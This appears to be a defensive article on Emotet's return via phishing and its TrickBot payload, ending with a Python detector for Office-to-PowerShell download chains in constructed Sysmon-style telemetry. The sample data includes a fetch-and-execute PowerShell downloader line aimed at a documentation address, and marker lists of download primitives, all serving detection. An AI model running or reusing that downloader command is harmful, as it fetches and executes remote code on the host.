Spam e-mails and socially engineered attacks have been pouring in during this pandemic. With most of us working from home, the chances of exposing ourselves and our organizations to these malicious actors have risen sharply. During March and April, the internet saw massive COVID-19-themed phishing campaigns, and now the infamous Emotet is back to haunt enterprise networks.
After almost five months of inactivity, the Emotet malware was spotted on the internet again by James Quinn, a researcher at Binary Defense. It is being distributed through phishing e-mails disguised as payment reports, employment opportunities, receipts, and invoices.
Before we discuss how to defend against this malware instance, we first need to understand its characteristics.
Emotet is a Trojan distributed via phishing e-mails whose subject lines typically mention time-sensitive matters such as deliveries, invoices, and payment details to pressure recipients into opening them. The e-mails are well crafted to impersonate legitimate entities, and the attached documents carry malicious scripts or macro-enabled content.
Once a recipient opens the attachment and enables its macros, the embedded script takes hold of the victim's device: it contacts a command-and-control (C&C) server, retrieves the Emotet payload, and installs it on the host.
Emotet also carries detection-evasion logic: if it finds itself running inside a virtual machine (VM), it stays dormant, so the sandboxes that security teams use to analyze threats observe no malicious behavior. On top of this, Emotet receives version updates that improve its resistance to detection, let it deploy other malware such as banking Trojans and ransomware, and extend what it steals: credentials, usernames, financial details, and other data from the device.
Once Emotet is installed on a system, it begins pulling additional payloads from the C&C server. In the version currently circulating, Emotet downloads the TrickBot Trojan, which targets Windows machines.
TrickBot can carry out several malicious activities on an infected device, including stealing the Active Directory database, OpenSSH keys, VNC, RDP, and PuTTY credentials, and banking credentials. It then moves laterally through the network to infect other devices.
In some cases, TrickBot is also used to stage ransomware: it opens a reverse shell that gives ransomware operators access to the network, and they then push their payload onto the other devices they can reach.
Educate your security staff on the Emotet attack workflow, and make sure they know TrickBot and its capabilities. Advise employees not to open unexpected e-mails or attachments without confirming with the sender through another channel. Furthermore, block e-mail from blacklisted domains to reduce the probability of malware reaching inboxes at all.
Sound browser-security practice also gives defenders an upper hand over these phishing campaigns: keep plugins and extensions updated, use browser isolation, restrict file downloads from unauthorized websites, and enforce kiosk mode so that employees reach only IT-approved websites and business web applications.
If malware is already inside the network and has infected your devices, it's time to respond. To detect and neutralize threats as early as possible, deploy an endpoint protection solution that can identify these threats and remove them, and keep your antivirus current with the latest malware definitions so that it reliably catches known threats like these. Because Emotet is updated frequently, signatures alone will lag behind it; back them up with behavioral monitoring of the infection chain described above, in particular an Office document handing off to a script that reaches out to a C&C server.
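The delivery chain described above (a macro-enabled Office attachment whose script fetches the Emotet payload from the C&C server) leaves a very recognizable trace on the endpoint: an Office process spawning a script host such as PowerShell, often with a Base64-encoded command that downloads and executes the next stage. The following Python is an added example, not code from the original article, that runs that behavioral check over process-creation telemetry. The records are constructed for this example in the shape of Sysmon Event ID 1 events after JSON parsing; the hostnames, file paths, timestamps and the URL are made up, and the marker lists are assumptions a defender would tune to their own environment.

```python
"""Flag the Emotet-style delivery chain in process-creation telemetry.

Two signals are combined:
  1. an Office application spawning a script host (PowerShell, cmd, wscript, ...);
  2. a Base64-encoded PowerShell command line (-EncodedCommand and the short
     forms PowerShell accepts) that decodes to a download-and-execute primitive.
The sample events are constructed, shaped like Sysmon Event ID 1 records after
JSON parsing; hostnames, paths and the URL are made up for this example.
"""
import base64

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}
# Lower-cased fragments that stage-one downloaders commonly contain once decoded
# (assumed list; extend it from your own incident data).
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "net.webclient",
                    "invoke-webrequest", "start-bitstransfer", "invoke-expression", "iex")


def image_name(path):
    """Lower-case file name of a Windows image path ('C:\\...\\WINWORD.EXE' -> 'winword.exe')."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ps_encode(script):
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, Base64).
    Used here only to build the constructed sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line passes -EncodedCommand (or one of
    the abbreviations PowerShell accepts: -e, -ec, -enc, ...), else None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag[0] not in "-/":
            continue
        name = flag[1:].lower()
        if not name or not ("encodedcommand".startswith(name) or name == "ec"):
            continue
        try:
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None  # flag present but the argument is not a valid encoded command
    return None


def detect(event):
    """Return the reasons this event looks like a maldoc-to-downloader chain ([] if none)."""
    reasons = []
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
    if child in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(event.get("CommandLine", ""))
        if decoded is not None:
            hits = [m for m in DOWNLOAD_MARKERS if m in decoded.lower()]
            if hits:
                reasons.append("encoded PowerShell downloads/executes remote content: "
                               + ", ".join(hits))
            elif reasons:
                # Encoded PowerShell on its own is too common in admin tooling to alert
                # on; it only adds weight when the Office parent already looks wrong.
                reasons.append("encoded PowerShell command")
    return reasons


def scan(events):
    """Run detect() over a batch and return (time, host, reasons) for each alert."""
    alerts = []
    for ev in events:
        reasons = detect(ev)
        if reasons:
            alerts.append((ev["UtcTime"], ev["Computer"], reasons))
    return alerts


OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
SYS32 = r"C:\Windows\System32"
# Constructed stage-one downloader; 198.51.100.23 is a documentation address, not a real C&C.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/invoice.php')"

# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    {"UtcTime": "2020-07-20 09:14:02", "Computer": "WS-FIN-07",
     "ParentImage": OFFICE + r"\WINWORD.EXE",
     "Image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -enc " + ps_encode(STAGE1)},
    {"UtcTime": "2020-07-20 09:13:55", "Computer": "WS-FIN-07",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": OFFICE + r"\WINWORD.EXE",
     "CommandLine": '"WINWORD.EXE" /n "C:\\Users\\ak\\Downloads\\Invoice_2207.doc"'},
    {"UtcTime": "2020-07-20 10:02:41", "Computer": "WS-HR-03",
     "ParentImage": OFFICE + r"\EXCEL.EXE",
     "Image": SYS32 + r"\cmd.exe",
     "CommandLine": "cmd /c start /min C:\\Users\\Public\\update.bat"},
    {"UtcTime": "2020-07-20 10:30:00", "Computer": "SRV-MGMT-01",
     "ParentImage": SYS32 + r"\svchost.exe",
     "Image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -EncodedCommand "
                    + ps_encode("Get-Date | Out-File C:\\ops\\heartbeat.txt")},
]

if __name__ == "__main__":
    for when, host, reasons in scan(SAMPLE_EVENTS):
        print(f"{when} {host}: " + "; ".join(reasons))
```

Run against the sample, the first event is flagged on both signals (Word spawning PowerShell, and the decoded command calling DownloadString plus IEX), the Excel-to-cmd event is flagged on the parent-child relationship alone, and the two benign events are ignored, including the scheduled encoded PowerShell job, which is exactly the kind of activity that makes "any -EncodedCommand" rules too noisy to keep. Baseline the Office-to-script-host rule before enforcing it, since some macro-driven business workflows will trigger it, and treat the rule as one signal among several: the operators change loaders and process chains between campaigns.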